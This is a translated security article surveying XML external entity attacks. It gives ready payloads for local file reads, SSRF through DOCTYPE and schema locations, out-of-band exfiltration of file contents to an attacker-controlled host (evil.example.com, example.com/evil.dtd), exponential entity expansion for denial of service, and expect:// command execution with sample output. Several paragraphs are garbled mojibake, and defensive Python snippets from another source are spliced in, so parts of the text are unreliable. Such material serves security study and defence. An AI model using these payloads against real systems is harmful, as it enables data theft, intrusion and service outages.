What You Don't Know About XML Security: A Summary of XML Attack Methods
 
Author: 小飞  Source: 51CTO  Published: 2015-03-08


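0x00 Introduction to XML

XML, the Extensible Markup Language, was designed to transport and store data. It takes many forms.

For example:

1. Document formats (OOXML, ODF, PDF, RSS, DOCX...)

2. Image formats (SVG, EXIF Headers,...)

3. Configuration files (custom names, usually .xml)

4. Network protocols (WebDAV, CalDAV, XMLRPC, SOAP, REST, XMPP, SAML, XACML,...)

Some features designed into XML, such as XML schemas (following the XML Schemas specification) and document type definitions (DTDs), are sources of security problems. Although they have been discussed publicly for more than ten years, large numbers of software products still fall to attacks against XML.

The XML entity mechanism is easy to understand if you think of it as "escaping": &#x25 and &foo are the same thing in their original sense, except that the content of the latter is defined by us and can be anything.

Take DTDs. A DTD can declare entities to define variables (or text macros) for use later in the DTD or in the XML document. General entities are defined in the DTD and are used to access internal resources, fetching the text there and substituting it into the XML document, while external entities are used to access external resources (that is, resources that can come from the local machine or from a remote host). While resolving external entities, the XML parser may use many network protocols and services (DNS, FTP, HTTP, SMB and so on), depending on what the URLs specify. External entities are useful for handling documents that are updated in real time, but attacks can also happen while external entities are being resolved. The attacks include:

1. Reading local files (which may contain sensitive information, e.g. /etc/shadow)

2. Memory corruption

3. Arbitrary code execution

4. Denial of service

This article summarizes the XML attack methods that have appeared over the years.

0x01 A First Look at XML External Entity Attacks

File inclusion based on external entities

The earliest XML attack method to be proposed uses the external entity reference feature to read arbitrary files: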

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE updateProfile [
<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]>
<updateProfile> <firstname>Joe</firstname> <lastname>&file;</lastname>
...
</updateProfile>

This kind of read is limited, however, because the XML parser requires the referenced data to be complete. We use an example to explain what "complete" means.

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE simpleDocument [
<!ENTITY first "<my">
<!ENTITY second "tag/>"> ]>
<simpleDocument>&first;&second;</simpleDocument>

ÈçÉϵÄxmlÎĵµµ±·¢Ë͸ø·þÎñÆ÷ʱ£¬Êµ¼ÊÉÏÊÇ»á²úÉúÒ»¸ö´íÎóµÄ ÆäÖÐËäÈ»ÔÚ×éºÏÔÚÒ»ÆðʱÊÇÄܹ»ÍêÃÀ±ÕºÏµÄ£¬µ«ÊÇÕâЩʵÌåÓÉÓÚÔÚµÚ3£¬4Ðоͱ»½âÎöÒ»´Î£¬´ËʱÓÉÓÚ²»ÊÇÍêÃÀ±ÕºÏµÄ£¬¾Í»áÅ׳öÒ»¸ö´íÎó¡£

ÕâÖÖ´íÎóÈÃxml¹¥»÷Ò»¶È±äµÃ¼¦À߯ðÀ´£¬ÒòΪʵ¼ÊÉϺܶàÎļþ¶¼ÊÇ¡°Î´±ÕºÏÐÎʽ¡±µÄ£¬±ÈÈçÔÚphpÎļþÍÆ¼öµÄд·¨ÖоÍÊÇÖ»ÓÐÇ°ÃæÒ»¸ö"
¸üÔã¸âµÄÊÇ£¬µ±ÄãÑ¡Ôñ°üº¬µÄÊÇÒ»¸öÍêÕûµÄxmlÎļþ(±ÈÈçÊý¾Ý¿âÁ¬½ÓÎļþ)µÄʱºò£¬·µ»Ø½á¹û½«ÊÇ

¿ÉÒÔ¿´µ½£¬ÔÚ±êÇ©ÖеÄÊý¾Ý¿âÅäÖÃÎĵµ±»Ç¶Èëʱ£¬´ó²¿·ÖÄÚÈݶ¼ÊÇÊ¡ÂԺţ¬Ö»ÏÔʾÁËÎĵµµÄ½á¹¹¡£ÕâÊÇÓÉxml parserÌØÐÔ¾ö¶¨µÄ¡£

URL Invocation

XML¹¥»÷ÖÐÓÐÒ»¿é³£³£±»ºöÊÓ£¬ÄǾÍÊÇÀûÓÃURL»úÖÆÒÔ¼°ËûÃǵÄÒ»Ð©Ææ¹ÖµÄÌØÐÔÀ´À©´ó¹¥»÷Ãæ¡£

ËäÈ»XML¹æ·¶²¢Ã»ÓÐÒªÇóÖ§³ÖÈκÎÌØ¶¨µÄURL»úÖÆ£¬µ«Ðí¶àƽ̨µÄµ×²ãÍøÂç¿âÈ´Ö§³ÖÁ˼¸ºõËùÓÐURL»úÖÆ¡£

½èÖúURLs£¬¹¥»÷Õß¿ÉÒÔÈÃÔËÐÐ×ÅXMLparserµÄÖ÷»úÏòµÚÈý·½Ö÷»ú·¢Æð¶ñÒâÇëÇó.

±ÈÈç¡°server-side request forgery¡±(ssrf).ÀíÂÛÉÏÀ´Ëµ£¬URL InvocationÉõÖÁ¿ÉÒÔÓÃÀ´·¢ÆðÄÚ²¿ÍøÂçÖеĺéË®¹¥»÷¡£

´ó²¿·ÖÈ˲»ÖªµÀµÄÊÇ£¬¼´Ê¹ÍⲿʵÌå±»½ûÓÃÁË£¬Ðí¶àxml parsers»¹ÊÇ»áÈ¥½âÎöÄÇЩURL¡£¾Ù¸öÀý×Ó£¬Ò»Ð©parsers»áÔÚÎĵµ¶¨Òå½×¶Î¶Ôurl·¢ÆðÇëÇó

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://internal/service?ssrf">
<roottag>这不是实体攻击！</roottag>

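Besides external entities and DOCTYPE-based SSRF, XML Schema provides two special attributes, used in instance documents, that point to the location of the schema document. The two attributes are xsi:schemaLocation and xsi:noNamespaceSchemaLocation. The former is used for schema documents that declare a target namespace, the latter for schema documents without a target namespace. They are normally used in instance documents.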

<roottag xmlns="http://schema/namespace/primary"
xmlns:secondaryns="http://schema/namespace/secondary"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://schema/namespace/primary
http://location/of/remote/schema/primary.xsd
http://schema/namespace/secondary
http://location/of/remote/schema/secondary.xsd">
<p>
<secondaryns:s>
...
</secondaryns:s>
</p>
</roottag>

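In this example, everything with the secondaryns: prefix follows the scheme defined in xmlns:secondaryns. Because a DOCTYPE definition cannot appear in the middle of a document, when we control only one part of the document we can use schema_Location (http://location/of/remote/schema/primary.xsd) to trigger SSRF. (This assumes certain settings are turned on. We have not tested every XML parser thoroughly enough to know what each environment requires for an SSRF attack to work, so this remains a direction for research; interested wooyuners are welcome to discuss~)

0x02 Attack Techniques Once Parameter Entities Are Introduced

When our malicious XML is parsed successfully, we may face two problems:

First, the data is not closed, so embedding fails (for example, when there is only

Second, the server imposes restrictions, so the data cannot be returned.

Once parameter entities are introduced, both problems can be solved.

Parameter entities start with %. To use parameter entities we only need to follow two rules:

Parameter entities can only be used in DTD declarations.
A parameter entity cannot reference another parameter entity.

A neat use of CDATA escaping

CDATA sections: everything inside a CDATA section is ignored by the XML parser, that is, the content of a CDATA section acts only as a text string. A CDATA section ends with the "" marker. So can we construct a page like this to return those files?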

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///etc/fstab">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd">
%dtd;
]>
<roottag>&all;</roottag>

combine.dtd is as follows:

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY all "%start;%goodies;%end;">

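As mentioned earlier, XML parsers interpret entities immediately, and an entity that is not closed throws an error. So why can the parameter entities %start and %end here be parsed normally? Because a reference to a parameter entity does not need to keep the XML closed at the time the XML document is parsed, which gets around the restriction.

In this way we can read all the data (base64 encoding also works).

Bypassing the echo restriction with out-of-band data

Another way to use parameter entities is to carry the data out of band.

With parameter entities, we can send the file we want to read to our own server over some protocol (http, ftp and so on), and then obtain the data by looking at the logs. We can construct it like this: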

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [  
<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://example.com/evil.dtd"> %dtd;]>
<roottag>&send;</roottag>

Then, at http://example.com/, which we control, place the following DTD:

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/?%file;'>"> %all;

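The flow is as follows

Esoteric XXE Tricks

File inclusion based on XInclude

XInclude provides a more convenient way to retrieve data (no more worrying that incomplete data will make the parser throw an error), and we can force the type of the referenced file through the parse attribute.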

<root xmlns:xi="http://www.w3.org/2001/XInclude"> 
<xi:include href="file:///etc/fstab" parse="text"/>
</root>

However, XInclude has to be enabled manually; testing found that every XML parser has this feature turned off by default.
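An added example (not from the original article), in Python: because schema location hints and XInclude elements need no DOCTYPE, a service can list the URLs an instance document asks the parser to fetch and flag those outside an allow-list before it enables schema validation or XInclude. The allow-listed host, the function names and the sample document are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XSI = "http://www.w3.org/2001/XMLSchema-instance"
XI = "http://www.w3.org/2001/XInclude"
TRUSTED_HOSTS = {"schemas.example.internal"}  # hypothetical allow-list


def remote_references(xml_text: str) -> list:
    """Return (kind, url) for every location hint a parser might dereference."""
    refs = []
    for elem in ET.fromstring(xml_text).iter():
        # schemaLocation is a whitespace-separated list of namespace/URL
        # pairs; the URL is the second item of each pair.
        pairs = elem.get(f"{{{XSI}}}schemaLocation", "").split()
        refs += [("schemaLocation", url) for url in pairs[1::2]]
        no_ns = elem.get(f"{{{XSI}}}noNamespaceSchemaLocation")
        if no_ns:
            refs.append(("noNamespaceSchemaLocation", no_ns))
        if elem.tag == f"{{{XI}}}include" and elem.get("href"):
            refs.append(("xi:include", elem.get("href")))
    return refs


def untrusted(refs: list) -> list:
    """Keep references that are not https URLs on an allow-listed host."""
    bad = []
    for kind, url in refs:
        parts = urlsplit(url)
        if parts.scheme != "https" or parts.hostname not in TRUSTED_HOSTS:
            bad.append((kind, url))
    return bad


# Constructed sample modelled on the two documents shown in this article.
SAMPLE = """<roottag xmlns="http://schema/namespace/primary"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:xi="http://www.w3.org/2001/XInclude"
  xsi:schemaLocation="http://schema/namespace/primary
    https://schemas.example.internal/primary.xsd
    http://schema/namespace/secondary
    http://location/of/remote/schema/secondary.xsd">
  <xi:include href="file:///etc/fstab" parse="text"/>
</roottag>"""
```

ElementTree itself neither fetches schemas nor processes XInclude unless asked, so the scan does not trigger the requests it reports.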

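Denial of service

XXE attacks can also be used to launch denial-of-service attacks.

In the recursive references below, the amount of data grows exponentially from the bottom up: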

<?xml version="1.0"?> 
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

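Recall the parsing process: when the XML processor loads this document, it includes the root element, which contains the entity &lol9;, and the lol9 entity expands into the string "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;".

As this recursion continues, what is pushed into memory grows exponentially. Experiments show that an XML attack payload of less than 1 KB can consume 3 GB of memory.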
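An added example (not from the original article), in Python: a parser wrapper that refuses any document carrying a DOCTYPE, which shuts out the external-entity, DOCTYPE-URL, parameter-entity and recursive-expansion documents described above before anything is resolved or expanded. The names `parse_without_dtd`, `ForbiddenXML`, `is_rejected` and the sample documents are constructed for illustration.

```python
import xml.parsers.expat


class ForbiddenXML(ValueError):
    """The document uses a DTD feature this parser refuses."""


def parse_without_dtd(data: bytes) -> list:
    """Return the element names in `data`; raise ForbiddenXML on any DTD use."""
    names = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires at "<!DOCTYPE", before any entity is declared or expanded,
        # so neither the SYSTEM/PUBLIC identifier nor an entity is resolved.
        raise ForbiddenXML(f"DOCTYPE {name!r} refused (system id {system_id!r})")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        raise ForbiddenXML(f"entity declaration {name!r} refused")

    def on_external_ref(context, base, system_id, public_id):
        raise ForbiddenXML(f"external entity {system_id!r} refused")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl        # defence in depth
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)
    return names


def is_rejected(data: bytes) -> bool:
    """True when the document is refused because it carries a DTD."""
    try:
        parse_without_dtd(data)
        return False
    except ForbiddenXML:
        return True


# Constructed samples modelled on the payloads shown in this article.
SAMPLES = {
    "file_entity": b'<!DOCTYPE p [<!ENTITY file SYSTEM "file:///c:/windows/win.ini">]>'
                   b"<p>&file;</p>",
    "doctype_ssrf": b'<!DOCTYPE r PUBLIC "-//VSR//PENTEST//EN" '
                    b'"http://internal/service?ssrf"><r/>',
    "expansion": b'<!DOCTYPE l [<!ENTITY a "lol"><!ENTITY b "&a;&a;&a;">]><l>&b;</l>',
    "benign": b"<updateProfile><firstname>Joe</firstname></updateProfile>",
}
```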

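Attacks and Limitations in Specific Environments

Java & Xerces

The default XML parser in Oracle's Java Runtime Environment is Xerces, an Apache project. Xerces and Java provide a range of features, and those features in turn lead to some serious security problems. The attack techniques described above (DOCTYPEs for SSRF, file reading, out-of-band data via parameter entities) all work freely under Java's default configuration. Java/Xerces also supports XInclude, but this requires setXIncludeAware(true) and setNamespaceAware(true).

Java supports the following URL schemes: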

http
https
ftp
file
jar

ÁîÈ˳ԾªµÄÊÇJavaµÄfileЭÒéÄܹ»ÓÃÀ´ÁÐĿ¼£¬±ÈÈç˵£¬ÔÚlinuxÏÂÃæ¡°file:///¡±»áÁгö/Ŀ¼ÏÂËùÓж«Î÷£º

bin
boot
dev
etc
home
...

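With the jar protocol, jar:http://host/application.jar!/file/within/the/zip makes the server first fetch the file, then unpack the archive named between "jar:" and "!", and extract the file named after it. From the attacker's point of view, it is entirely possible to craft archives with a very high compression ratio (for example 1000:1). Such ZIP bombs can be used to attack antivirus systems or to exhaust the disk or memory of the target machine. Note that jar URLs can be used on any Java Xerces system that accepts DOCTYPE definitions, so the attack still works even when external entities are turned off.

RCE with PHP & expect

Unfortunately, this extension is not installed by default. However, an XXE vulnerability on a system that does have this extension installed allows arbitrary command execution.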

<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]> 
<dir>
<file>&cmd;</file>
</dir>

The following is then returned:

<file>uid=501(Apple) gid=20(staff) groups=20(staff),501(access_bpf),
12(everyone),61(localaccounts),79(_appserverusr),80(admin),
81(_appserveradm),98(_lpadmin),401(com.apple.sharepoint.group.1),
33(_appstore),100(_lpoperator),204(_developer),
398(com.apple.access_screensharing),399(com.apple.access_ssh)<file>

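XML injection

This has little to do with XXE attacks, but since this article is about XML security, it is included here as well.

$GLOBALS["HTTP_RAW_POST_DATA"] is set to "unescaped" in PHP. Once a program obtains data through entities and passes it straight into MySQL, the result is injection.

A case is as follows:

WooYun: XML injection and SQL injection in the latest version of PHPYUN to obtain the administrator account (bypassing all defences)

0x03 Summary

XXE attacks keep being overlooked.

Developers often say:

The threat is small..

Turning off entities avoids it completely...

What is an XML entity attack?

However, as the attacks above show, XML entity attacks have already produced many threats that developers did not expect.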

   